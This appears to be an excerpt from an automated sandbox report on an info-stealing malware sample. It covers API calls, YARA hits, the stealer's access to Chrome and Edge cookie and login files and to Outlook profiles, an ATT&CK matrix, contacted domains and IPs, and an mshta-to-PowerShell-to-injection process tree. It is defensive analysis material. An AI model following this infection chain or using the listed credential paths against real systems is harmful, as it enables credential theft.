                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00144E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00144E87
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00151E06 GetUserNameW,6_2_00151E06
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00143F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_00143F3A
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_001149A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000000C.00000002.3816264439.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.1687105036.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.3817612189.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.1684081260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000D.00000002.3819745162.0000000005830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.3817513274.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.1687168509.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000B.00000002.3817630308.0000000002340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\calc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\SysWOW64\calc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\calc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\calc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\calc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\calc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                  Source: C:\Windows\SysWOW64\calc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                  Source: C:\Windows\SysWOW64\calc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\calc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                  Source: cosses.exe Binary or memory string: WIN_81
                  Source: cosses.exe Binary or memory string: WIN_XP
                  Source: cosses.exe Binary or memory string: WIN_XPe
                  Source: cosses.exe Binary or memory string: WIN_VISTA
                  Source: cosses.exe Binary or memory string: WIN_7
                  Source: cosses.exe Binary or memory string: WIN_8
                  Source: cosses[1].exe.3.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                  Remote Access Functionality

                  Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000000C.00000002.3816264439.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.1687105036.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.3817612189.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.1684081260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000D.00000002.3819745162.0000000005830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.3817513274.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.1687168509.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000B.00000002.3817630308.0000000002340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Roaming\cosses.exe Code function: 6_2_00186283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00186283
                  Source: C:\Users\user\AppData\Roaming\cosses.exe Code function: 6_2_00186747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00186747

                  MITRE ATT&CK Matrix

                  Techniques matched by this analysis are marked with the count shown in the report, in parentheses; the remaining entries are the unmatched techniques of the matrix.

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                  Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                  Execution: Native API (2); Command and Scripting Interpreter (11); PowerShell (3); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                  Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                  Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At; Cron
                  Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (31); Access Token Manipulation (21); Process Injection (412)
                  Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                  Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (128); Security Software Discovery (251); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); Network Service Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                  Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (11); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                  Command and Control: Ingress Tool Transfer (14); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (14); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                  Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                  Behavior Graph

                  Behavior Graph ID: 1640150, Sample: clearpicturewithmebestthing..., Startdate: 17/03/2025, Architecture: WINDOWS, Score: 100

                  Domains contacted: www.zeniow.xyz; www.vaishnavi.xyz (Performs DNS queries to domains with low reputation); 18 other IPs or domains
                  Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 8 other signatures

                  Process tree (started = child process created, injected = code injected into the process):
                  mshta.exe (started)
                    Signatures: Suspicious command line found; PowerShell case anomaly found
                    -> cmd.exe (started)
                       Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found
                       -> powershell.exe (started)
                          Network: 172.245.123.24, 49717, 80 AS-COLOCROSSINGUS United States
                          Dropped: C:\Users\user\AppData\Roaming\cosses.exe (PE32); C:\Users\user\AppData\Local\...\cosses[1].exe (PE32); C:\Users\user\AppData\...\fjq1drut.cmdline (Unicode)
                          Signatures: Loading BitLocker PowerShell Module; Powershell drops PE file
                          -> cosses.exe (started)
                             Signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; 2 other signatures
                             -> svchost.exe (started)
                                Signatures: Maps a DLL or memory area into another process
                                -> hudFv7yP8kEYIbmJoqYH.exe (injected)
                                   Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                                   -> calc.exe (started)
                                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                                      -> hudFv7yP8kEYIbmJoqYH.exe (injected)
                                         Network: shedsworld.shop 162.255.118.68, 49770, 49771, 49772 NAMECHEAP-NETUS United States; statusq.studio 13.248.243.5, 49762, 49763, 49764 AMAZON-02US United States; 7 other IPs or domains
                                         Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                                      -> firefox.exe (started)
                          -> csc.exe (started)
                             Dropped: C:\Users\user\AppData\Local\...\fjq1drut.dll (PE32)
                             -> cvtres.exe (started)
                       -> conhost.exe (started)
